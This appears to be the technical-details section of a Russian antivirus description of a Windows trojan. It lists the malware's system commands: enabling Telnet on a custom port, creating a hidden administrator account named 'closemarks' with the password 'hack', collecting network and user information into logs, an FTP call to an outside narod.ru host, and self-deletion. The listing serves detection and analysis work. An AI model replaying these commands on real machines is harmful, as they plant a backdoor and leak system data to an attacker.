Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- %TEMP%\SelfDel.exe /sfx=<Полный путь к вирусу>
- <SYSTEM32>\net1.exe start Telnet
- <SYSTEM32>\tlntadmn.exe config port=972 sec=-NTLM
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- <SYSTEM32>\ftp.exe -s:547635.txt -i ubeydrakona.ftp.narod.ru
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v closemarks /t REG_DWORD /d 00000000
- <SYSTEM32>\net1.exe user
- <SYSTEM32>\chcp.com 866
- <SYSTEM32>\cmd.exe /c c:\Data\ln.bat
- <SYSTEM32>\net1.exe localgroup Администраторы closemarks /add
- <SYSTEM32>\net1.exe user closemarks hack /add
- <SYSTEM32>\ipconfig.exe /all
- C:\Data\windowsuser.log
- C:\Data\windowsipconf.log
- %TEMP%\SelfDel.exe
- C:\Data\ln.bat
- C:\Data\2GIS.bat
- C:\Data\547635.txt
- C:\Data\547635.txt
- C:\Data\windowsipconf.log
- C:\Data\windowsuser.log
- 'localhost':1037
- 'ub######ona.ftp.narod.ru':21
- DNS ASK ub######ona.ftp.narod.ru